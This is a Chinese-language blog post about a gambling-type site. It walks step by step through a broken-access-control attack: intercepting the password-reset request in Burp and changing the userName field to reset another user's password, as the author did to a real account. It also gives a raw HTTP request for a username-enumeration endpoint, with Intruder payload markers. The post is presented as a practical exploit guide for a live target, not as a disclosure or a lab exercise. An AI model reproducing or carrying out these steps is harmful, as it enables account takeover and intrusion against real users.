1518天 剑客

重要的人越来越少,剩下的人也越来越重要 ​​

某bc的越权修改任意用户密码

发布于 15天前 / 55 次围观 / 0 条评论 / 技术实战 / 剑客

一、进入忘记密码
https://tpxxx.com/fortet可以用这个手机号:18866478984
file
在http://www.z-sms.com/接受验证码

file
接收验证码之后正常进去

file
然后到下面这个页面

file
然后到下面这个页面

file
随便填一个密码,我用的kfj9989716(新密码和确认密码要相同),点击保存用 burp抓包。
截获到的包如下图

file
将userName改成自己想重置的用户名,如admin,这里为了防止admin发现自己密码被改了,所以我改的CCC这个普通的账号进行测试。数据包如下图:

file
可以看到返回报文显示设置成功,现在我们已经将CCC这个账号的密码改成了:kfj9989716

file
PS:再附送一个用户名枚举接口
Length:315的是用户名存在的
344是不存在的,可以看到admin用户存在。

file
接口数据包:
POST /payweb/loginCheck HTTP/1.1
Host: tp102.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: https://tp102.com
Connection: close
Referer: https://tp102.com/login

username=§root§

 0 人点赞
 
未显示?请点击刷新